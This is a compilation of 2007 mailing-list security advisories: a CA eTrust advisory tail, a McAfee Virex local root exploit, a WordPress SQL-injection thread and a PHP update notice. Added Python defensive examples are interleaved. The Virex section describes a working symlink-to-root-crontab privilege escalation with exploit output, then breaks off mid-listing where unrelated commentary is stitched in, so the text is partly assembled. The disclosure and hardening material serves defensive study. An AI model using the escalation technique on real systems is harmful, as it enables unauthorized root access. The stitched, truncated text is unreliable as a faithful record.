iDefense has confirmed this vulnerability in Computer Associates eTrust Intrusion Detection version 3.0.5.57. Other versions are suspected vulnerable.

V. WORKAROUND

iDefense is not aware of any workarounds for this issue.

VI. VENDOR RESPONSE

Computer Associates has issued patches to correct this vulnerability. More information is available in their advisory which can be found at the following URL.

http://supportconnectw.ca.com/public/ca_common_docs/eid_secnotice.asp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1005 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

01/16/2007 Initial vendor notification
01/16/2007 Initial vendor response
02/27/2007 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[Full-disclosure] [NETRAGARD-20070220 SECURITY ADVISORY] [McAfee VirusScan for Mac (Virex) Local root exploit and Scan Bypass]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Netragard, L.L.C Advisory
Strategic Reconnaissance Team
http://www.netragard.com -- We make I.T. Safe.

[POSTING NOTICE]
---
If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated.
Netragard Research: http://www.netragard.com/html/recent_research.html

[About Netragard]
---
Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team.

[Advisory Information]
---
Contact               : Adriel T. Desautels
Researcher            : Kevin Finisterre
Advisory ID           : NETRAGARD-20070220
Product Name          : McAfee VirusScan for Mac (Virex)
Product Version       : = Virex 7.7
Vendor Name           : McAfee
Type of Vulnerability : Local root exploit and Scan Bypass
Effort                : Easy

[Product Description]
---
"Guard your Macintosh systems and users against all types of viruses and malicious code, even new unknown threats with McAfee VirusScan for Mac." -- http://www.mcafee.com

[Technical Summary]
---
McAfee Virex contains an exploitable feature that enables users to define what files should be excluded from scanning. This feature relies on a configuration file with insecure privileges that is located in /Library/Application Support. Any user on the system can modify or delete the configuration file, thus affecting what Virex will scan. A simple example of such a modification would be to echo into the file, which in turn would cause Virex to ignore all files on the entire system.

[Technical Details]
---
An exploitable vulnerability exists in McAfee Virex that can be used to gain root privileges on an affected system. This vulnerability exists within the feature that enables users to define files for scan exclusion. The configuration file used to store scan exclusion files has insecure permissions of rw-rw-rw and as such can be modified or removed by any user.

Upon system boot the VShieldCheck process, which runs with root privileges, verifies the existence of the VShieldExecute.txt file located at:

/Library/Application Support/Virex/VShieldExecute.txt

If VShieldCheck does not find the file at boot then it recreates the file with the rw-rw-rw permissions. The exact command that it uses to set those permissions is shown below:

SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod
/bin/chmod a+rw '%s' > /dev/null 2>&1

The VShieldCheck process does not check for symlinks prior to creating the VShieldExecute.txt file. If an attacker creates a symlink to /var/cron/tabs/root from /Library/Application Support/Virex/VShieldExclude.txt then the file /var/cron/tabs/root will be created with writable permissions by the VShieldCheck process at the next system boot. Once the file is created the attacker can insert arbitrary commands into the newly created cron file that will be executed with root privileges.

Example:

SNOsoft-virexuser$ crontab -l
crontab: no crontab for virexuser
SNOsoft-virexuser$ Desktop/pwn_virex.pl
Usage: Desktop/pwn_virex.pl target
Targets:
 0 . Virex 7.7.dmg
SNOsoft-virexuser$ Desktop/pwn_virex.pl 0
*** Target: Virex 7.7.dmg
/Library/Application Support/Virex/VShieldExclude.txt
wait for a reboot a cron run...
SNOsoft-virexuser$ crontab -l
* * * * * /usr/bin/perl /Users/Shared/droptab.pl
SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/
total 88
drwxrwxr-x   5 root     admin   170 Oct 15 22:08 .
drwxrwxr-x  10 root     admin   340 Nov  3 11:11 ..
lrwxr-xr-x   1 virusbar admin    19 Oct 15 22:08 VShieldExclude.txt -> /var/cron/tabs/root
-rwxr-xr-x   1 root     wheel
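The advisory describes two defects in one privileged code path: the exclusion file is trusted although any user can write it, and it is recreated through a path that is never checked for a planted symlink before a blanket `chmod a+rw`. The following is an added example (not the product's code, not from the advisory) of what the defensive counterpart looks like: an `lstat`-based audit that flags a symlink or loose permissions on an existing config file, and a re-creation routine that uses `O_CREAT|O_EXCL` (plus `O_NOFOLLOW` where available) so that a pre-planted link makes the open fail instead of redirecting the write. The directory and file names are constructed for a throwaway temp directory.

```python
"""Defensive checks for a privileged process that (re)creates a config file.
Added example, not the product's code; paths below are constructed."""
import os
import stat
import tempfile


def audit_config_file(path, expected_uid=0):
    """Return the weaknesses found on an existing configuration file.

    lstat() inspects the path entry itself rather than what a symlink points
    to, so a link planted by a local user is reported instead of followed.
    """
    findings = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing"]
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_uid != expected_uid:
        findings.append("unexpected-owner")
    return findings


def create_config_safely(path, content, mode=0o644):
    """Recreate a missing configuration file without following symlinks.

    O_CREAT|O_EXCL fails when anything already exists at `path`, a symlink
    included, so the write cannot be redirected to another file. The explicit
    mode (further restricted by umask) replaces a blanket `chmod a+rw`.
    Returns True if the file was created, False if the path was refused.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, mode)
    except FileExistsError:
        return False
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return True


def demo():
    """Constructed scenario: a dangling symlink sits where the config file
    should be, then a clean path is tried. Observations are returned as a dict."""
    base = tempfile.mkdtemp()
    uid = os.getuid()
    target = os.path.join(base, "privileged-target")  # stands in for a root-owned file
    link = os.path.join(base, "VShieldExclude.txt")   # constructed, named after the advisory
    os.symlink(target, link)  # the link a local user might plant before a reboot
    results = {
        "symlink_refused": not create_config_safely(link, b"", 0o644),
        "target_untouched": not os.path.exists(target),
        "symlink_findings": audit_config_file(link, uid),
    }
    fresh = os.path.join(base, "fresh-exclusions.txt")
    results["fresh_created"] = create_config_safely(fresh, b"# exclusions\n")
    results["fresh_findings"] = audit_config_file(fresh, uid)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the refused symlink, the untouched target and an empty finding list for the freshly created file. In a real audit the `expected_uid` would be 0 and the path the vendor's; the mode `0o644` keeps the file readable by the scanner's users while leaving writes to the owner.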
Re: [Full-disclosure] WordPress Search Function SQL-Injection
Justin Frydman - Thinkweb Media wrote:
> Can't replicate this in 2.0.7. Is this only for the 2.1.x branch then?

I have the same feeling, tested on multiple wp instances and can't reproduce on = 2.0.1 = 2.0.7.

Regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2007-0043-1 php php-mysql php-pgsql
rPath Security Advisory: 2007-0043-1
Published: 2007-02-27
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Remote System User Deterministic Unauthorized Access
Updated Versions:
php=/[EMAIL PROTECTED]:devel//1/4.3.11-15.9-1
php-mysql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.9-1
php-pgsql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.9-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988
https://issues.rpath.com/browse/RPL-1088

Description:
Previous versions of the php package are vulnerable to multiple vulnerabilities of varying severity. The most severe of these vulnerabilities are expected to enable remote code execution as the apache user via php applications that call certain functions such as str_replace(), imap_mail_compose(), or odbc_result_all().
Re: [Full-disclosure] WordPress Search Function SQL-Injection
Can't replicate this in 2.0.7. Is this only for the 2.1.x branch then?

On Tue, 27 Feb 2007 21:39:55 +0100 (CET), SaMuschie [EMAIL PROTECTED] wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> +---
> | SaMuschie Research Labs proudly presents . . .
> +---
> | Application: wordpress
> | Version: = 2.1.1
> | Vuln./Exploit Type: SQL-Injection
> | Status: 0day
> +---
> | Discovered by: Samenspender
> | Released: 20070227
> | SaMuschie Release Number: 2
> +---
>
> Searching for a single ,,comma,, generates a sql error message.
> e.g.: http://wordpress-deutschland.org/?s=,
> results in:
>
> WordPress Datenbank-Fehler: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DE' at line 1]
> SELECT SQL_CALC_FOUND_ROWS wpdorg_posts.* FROM wpdorg_posts WHERE 1=1 AND () AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DESC LIMIT 0, 10
>
> +---
> | Lameness Disclaimer
> +---
> | SaMuschie Research Labs was founded to publish
> | vulnerabilities within well known software products,
> | which are easy to discover and exploit.
> |
> | SaMuschie researchers just spend a minimum of time
> | and knowledge for each vulnerability. Hence readers of
> | this advisory are requested not to ask any questions
> | to the researchers they don't know the answer ;)
> +---
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFF5GSdMFgfGpQK8VERAvOWAJwLms5H6b4So3tO19lc3eHMGeNvLwCdHAP8
> ZfylSi7g8HINHkpBYzYgUqE=
> =fBdH
> -----END PGP SIGNATURE-----
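The quoted query shows what went wrong: the search string `,` produced no search terms, yet the code still emitted the `AND (...)` wrapper around an empty list, leaving `WHERE 1=1 AND ()` and a database error that echoes the table name back to the visitor. The following is an added example, not WordPress's code and not from the thread: a Python model of a search-clause builder with the same structural flaw beside a hardened version that emits no clause when there is nothing to search for and binds every term as a parameter. The tokenizer regex is an assumption chosen so that a lone comma yields zero terms, matching the quoted symptom; the table and rows are constructed and run in an in-memory SQLite database.

```python
"""Search-clause construction: the fragile pattern behind `AND ()` and its fix.
Added example, not WordPress's code; tokenizer and table are constructed."""
import re
import sqlite3

# Assumed tokenizer: words are runs of characters other than whitespace,
# quotes, commas and plus signs, so the input "," yields no terms at all.
TERM_RE = re.compile(r'[^\s",+]+')

SCHEMA = ("CREATE TABLE posts (id INTEGER, post_title TEXT, post_content TEXT, "
          "post_status TEXT, post_date TEXT)")
ROWS = [  # constructed sample posts
    (1, "Hello world", "first post", "publish", "2007-02-01"),
    (2, "Draft notes", "not public", "draft", "2007-02-02"),
    (3, "World news", "more text", "publish", "2007-02-03"),
]


def split_terms(s):
    return TERM_RE.findall(s)


def build_search_naive(s):
    """Fragile form: terms are interpolated into the SQL text and the
    `AND ( ... )` wrapper is emitted even when the term list is empty."""
    parts = [f"((post_title LIKE '%{t}%') OR (post_content LIKE '%{t}%'))"
             for t in split_terms(s)]
    search = " AND ".join(parts)
    return (f"SELECT id FROM posts WHERE 1=1 AND ({search}) "
            f"AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10")


def build_search_safe(s):
    """Hardened form: no search clause when there are no terms, and every
    term travels as a bound parameter. Returns (sql, params)."""
    terms = split_terms(s)
    params = []
    sql = "SELECT id FROM posts WHERE 1=1"
    if terms:
        clauses = []
        for term in terms:
            clauses.append("((post_title LIKE ?) OR (post_content LIKE ?))")
            params.extend([f"%{term}%", f"%{term}%"])
        sql += " AND (" + " AND ".join(clauses) + ")"
    sql += " AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10"
    return sql, params


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    con.executemany("INSERT INTO posts VALUES (?,?,?,?,?)", ROWS)
    return con


def naive_query_errors(s):
    """True when the naive SQL for `s` is rejected by the database: the
    syntax error the advisory quotes, whose text leaks the table name."""
    con = make_db()
    try:
        con.execute(build_search_naive(s))
    except sqlite3.OperationalError:
        return True
    return False


def run_search(s):
    """Execute the hardened query and return the matching post ids."""
    con = make_db()
    sql, params = build_search_safe(s)
    return [row[0] for row in con.execute(sql, params)]


if __name__ == "__main__":
    print(build_search_naive(","))          # shows the `AND ()` fragment
    print(naive_query_errors(","))          # True: the database rejects it
    print(run_search(","))                  # [3, 1]: lists published posts
    print(run_search("o'clock"))            # []: the quote is data, not SQL
```

The empty-term case is the one the thread could not reproduce on 2.0.x, so the check worth adding to a regression suite is simply that a delimiter-only search returns a normal page rather than an error; the parameterized form also keeps a term containing a quote from ever touching the statement text.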